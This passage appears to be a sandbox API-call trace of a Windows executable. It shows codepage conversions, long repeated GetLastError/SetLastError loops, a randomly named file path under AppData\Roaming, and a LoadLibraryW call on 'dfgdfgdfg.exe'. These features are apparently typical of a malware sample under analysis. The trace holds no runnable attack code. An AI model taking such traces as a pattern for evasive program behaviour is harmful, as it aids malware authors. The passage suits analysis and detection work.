lpUsedDefaultChar=0x0) returned 256 [0093.496] GetLastError () returned 0x5 [0093.496] SetLastError (dwErrCode=0x5) [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ") returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0093.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0b\xa9\xce\x09\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.496] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.500] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.500] GetLastError () returned 0x0 [0093.500] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.501] SetLastError (dwErrCode=0x0) [0093.501] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.502] GetLastError () returned 0x0 [0093.502] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.503] SetLastError (dwErrCode=0x0) [0093.503] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.504] SetLastError (dwErrCode=0x0) [0093.504] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.505] SetLastError (dwErrCode=0x0) [0093.505] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.506] SetLastError (dwErrCode=0x0) [0093.506] GetLastError () returned 0x0 [0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 [0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 [0093.507] SetLastError (dwErrCode=0x0) [0093.507] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.509] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.509] GetLastError () returned 0x0 [0093.509] SetLastError (dwErrCode=0x0) [0093.510] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.511] SetLastError (dwErrCode=0x0) [0093.511] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.512] SetLastError (dwErrCode=0x0) [0093.512] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.513] SetLastError (dwErrCode=0x0) [0093.513] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.514] SetLastError (dwErrCode=0x0) [0093.514] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.516] GetLastError () returned 0x0 [0093.516] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.517] GetLastError () returned 0x0 [0093.517] SetLastError (dwErrCode=0x0) [0093.518] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0093.518] AddAtomA (lpString=0x0) returned 0x0 [0093.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.518] AddAtomA (lpString=0x0) returned 0x0 [0093.518] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 